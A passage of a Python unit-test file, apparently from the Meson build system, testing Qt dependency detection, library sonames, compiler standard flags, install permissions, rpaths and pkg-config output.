self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '77 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
break
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
